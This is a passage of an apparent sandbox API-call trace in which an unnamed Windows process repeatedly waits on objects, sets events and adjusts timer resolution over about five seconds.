NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.440] SetEvent (hEvent=0x12c) returned 1 [0310.440] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.511] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.516] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.558] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.558] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.562] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.562] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.612] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.612] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.625] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.625] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.629] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.629] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.631] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.631] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.633] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.660] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.696] SetEvent (hEvent=0x190) returned 1 [0310.696] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.715] SetEvent (hEvent=0x12c) returned 1 [0310.715] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.739] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.740] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.766] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.766] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.769] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.769] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.777] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.778] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.787] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.787] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.792] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.792] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.834] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.854] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.854] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.859] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.859] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.879] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.879] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.926] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.926] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.939] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.942] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.942] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.946] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.946] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.951] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.951] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.956] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.956] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.971] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.988] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.988] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.996] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.996] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.067] timeEndPeriod (uPeriod=0x1) returned 0x0 [0311.067] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0311.074] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0311.074] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.104] timeEndPeriod (uPeriod=0x1) returned 0x0 [0311.104] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0311.111] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0311.111] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.192] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.235] SetEvent (hEvent=0x22c) returned 1 [0311.235] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.428] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.460] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.469] timeEndPeriod (uPeriod=0x1) returned 0x0 [0311.469] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0311.506] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0311.506] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.524] SetEvent (hEvent=0x198) returned 1 [0311.524] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.565] SetEvent (hEvent=0x104) returned 1 [0311.565] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.569] SetEvent (hEvent=0x104) returned 1 [0311.569] SetEvent (hEvent=0x1d0) returned 1 [0311.569] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.571] SetEvent (hEvent=0x1d0) returned 1 [0311.571] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.643] SetEvent (hEvent=0x1d0) returned 1 [0311.643] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.675] SetEvent (hEvent=0x1d0) returned 1 [0311.675] SetEvent (hEvent=0x104) returned 1 [0311.675] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.681] timeEndPeriod (uPeriod=0x1) returned 0x0 [0311.681] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0311.688] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0311.688] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.694] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.812] timeEndPeriod (uPeriod=0x1) returned 0x0 [0311.812] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0311.829] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0311.829] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0311.909] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.016] SetEvent (hEvent=0x21c) returned 1 [0312.016] SetEvent (hEvent=0x1dc) returned 1 [0312.017] SetEvent (hEvent=0x180) returned 1 [0312.017] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.020] SetEvent (hEvent=0x180) returned 1 [0312.020] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.158] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.252] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.407] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.410] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.410] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.424] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.425] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.427] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.444] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.478] SetEvent (hEvent=0x14c) returned 1 [0312.478] SetEvent (hEvent=0x134) returned 1 [0312.478] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.483] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.483] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.487] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.487] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.493] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.493] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.538] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.538] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.542] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.547] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.550] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.550] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.552] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.552] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.625] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.627] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.656] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.656] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.715] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.720] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.720] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.722] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.722] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.788] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.800] SetEvent (hEvent=0x22c) returned 1 [0312.800] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.835] SetEvent (hEvent=0x1e8) returned 1 [0312.835] SetEvent (hEvent=0x12c) returned 1 [0312.835] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.840] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.840] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.851] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.851] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.856] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.856] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.865] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.867] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.920] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.921] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.924] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.924] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.970] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.970] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.972] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.972] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0312.987] timeEndPeriod (uPeriod=0x1) returned 0x0 [0312.987] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0312.992] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0312.992] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.003] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.010] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.010] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.011] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.011] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.016] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.016] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.025] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.025] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.038] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.041] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.053] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.053] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.058] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.058] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.069] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.069] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.075] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.079] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.150] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.155] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.155] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.163] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.164] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.170] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.170] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.173] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.173] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.175] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.179] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.179] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.182] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.182] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.379] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.397] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.399] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.399] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.443] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.443] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.455] SetEvent (hEvent=0x1dc) returned 1 [0313.455] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.495] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.495] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.501] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.501] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.504] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.504] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.506] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.506] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.521] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.521] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.527] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.527] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.529] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.529] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.533] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.534] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.635] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.652] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.657] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.657] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.658] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.658] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.663] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.663] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.686] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.687] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.699] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.700] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.701] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.706] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.706] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.709] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.823] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.825] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.825] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.827] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.828] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.850] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.850] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.856] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.856] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.929] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.934] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.934] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.957] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.957] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.958] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0313.962] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.962] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0313.963] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.964] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.004] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.004] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.031] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.031] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.041] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.041] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.079] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.079] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.089] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.089] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.099] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.099] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.110] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.111] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.113] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.113] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.116] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.137] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.137] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.147] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.147] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.152] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.152] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.154] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.155] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.180] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.250] SetEvent (hEvent=0x20c) returned 1 [0314.250] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.256] SetEvent (hEvent=0x20c) returned 1 [0314.256] SetEvent (hEvent=0x214) returned 1 [0314.256] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.325] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.326] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.329] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.329] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.377] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.382] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.382] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.384] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.384] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.416] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.421] SetEvent (hEvent=0x20c) returned 1 [0314.421] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.529] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.529] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.536] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.536] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.541] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.541] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.543] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.543] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.550] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.605] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.618] SetEvent (hEvent=0x20c) returned 1 [0314.618] SetEvent (hEvent=0x220) returned 1 [0314.618] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.628] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.630] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.635] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.635] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.673] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.673] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.686] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.686] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.753] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.759] SetEvent (hEvent=0x190) returned 1 [0314.760] SetEvent (hEvent=0x214) returned 1 [0314.760] SetEvent (hEvent=0x14c) returned 1 [0314.760] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.774] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.780] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.781] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.815] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.815] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.826] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.828] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.828] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.830] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.830] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.842] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.903] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.913] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.942] timeEndPeriod (uPeriod=0x1) returned 0x0 [0314.942] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0314.944] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0314.944] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0314.970] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.005] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.016] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.016] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.043] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.044] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.055] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.056] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.056] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.078] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.079] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.088] NtWaitForSingleObject 